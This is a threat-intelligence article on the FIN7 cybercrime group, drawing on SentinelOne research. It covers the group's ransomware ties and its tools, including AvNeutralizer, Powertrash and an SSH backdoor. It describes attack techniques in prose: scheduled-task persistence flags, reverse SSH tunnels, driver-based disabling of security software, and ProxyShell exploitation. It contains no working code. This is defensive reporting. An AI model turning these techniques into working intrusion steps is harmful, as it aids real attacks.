FIN7’s Evolving Arsenal of Persistent Threats and Evasive Malware

Unraveling the threat presented by FIN7, also known as Carbon Spider or Sangria Tempest, a notorious financially motivated threat group active since 2012, is presented by SentinelOne offensive security researcher Antonio Cocomazzi. Tracing FIN7's activity is crucial given the wide range of sectors the group has targeted globally, including hospitality, energy, finance, manufacturing, high-tech, and retail. FIN7's roots are traced back to Russia. Initially, the group specialized in point-of-sale (POS) malware for financial fraud but shifted to ransomware operations around 2020, affiliating with groups like REvil and Conti. SentinelOne reports, FIN7 have also launched their own ransomware-as-a-service (RaaS) programs linked to names such as Darkside and BlackMatter. Notably, FIN7 has been linked to Black Basta ransomware and has established fraudulent infosec firms such as Combi Security and Bastion Secure to facilitate their attacks. Their proficiency in selling malware on underground forums further exemplifies their expertise in cybercriminal activities.

FIN7 employs a diverse toolkit, including Powertrash, Diceloader, Core Impact, an SSH-based backdoor, and AvNeutralizer among other crucial PowerShell and BAT scripts for their operations. For instance, their SSH-based backdoor installation script, "install.bat," creates multiple scheduled tasks to establish and maintain an SSH tunnel persistently. These scheduled tasks execute commands that run the SSH daemon and establish reverse SSH tunnels to remote servers, ensuring constant connectivity. Key flags in these commands include scheduling the tasks to run every minute (/sc minute /mo 1), using the NT AUTHORITY\SYSTEM account (/RU "NT AUTHORITY\SYSTEM"), and setting up port forwarding (-R and -D flags) to facilitate secure and persistent access. Cocomazzi reports that "given the nature of the targeted company, the group’s intention was to establish a covert and persistent access for future espionage operations."

AvNeutralizer, another tool in FIN7's arsenal, is specifically designed to disable endpoint security solutions. Recent iterations of AvNeutralizer use a combination of drivers and operations to create a failure in some specific implementations of protected processes, ultimately leading to a denial of service condition, explains Cocomazzi. This driver-based technique allows FIN7 to bypass defenses by exploiting legitimate system drivers. AvNeutralizer's effectiveness has made it a valuable tool marketed in underground forums, used by multiple ransomware groups, including Black Basta, AvosLocker, MedusaLocker, and LockBit.

FIN7's campaigns also involve exploiting vulnerabilities such as ProxyShell (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207) to gain initial access. Following successful exploitation, they utilize PowerShell droppers to deliver payloads like Powertrash and Diceloader. For example, SQL injection attacks on public-facing applications lead to the execution of sqlservr.exe, which spawns cmd and PowerShell processes to download and execute malicious implants. These implants facilitate further compromise, including establishing persistent access, executing payloads, and exfiltrating data.

FIN7's continuous evolution and innovative techniques highlight their technical expertise and adaptability. "FIN7’s continuous innovation, particularly in its sophisticated techniques for evading security measures, showcases its technical expertise. The group’s use of multiple pseudonyms and collaboration with other cybercriminal entities makes attribution more challenging and demonstrates its advanced operational strategies." The group's ongoing development and sale of tools like AvNeutralizer demonstrate the significant threat they pose in the cybercrime landscape.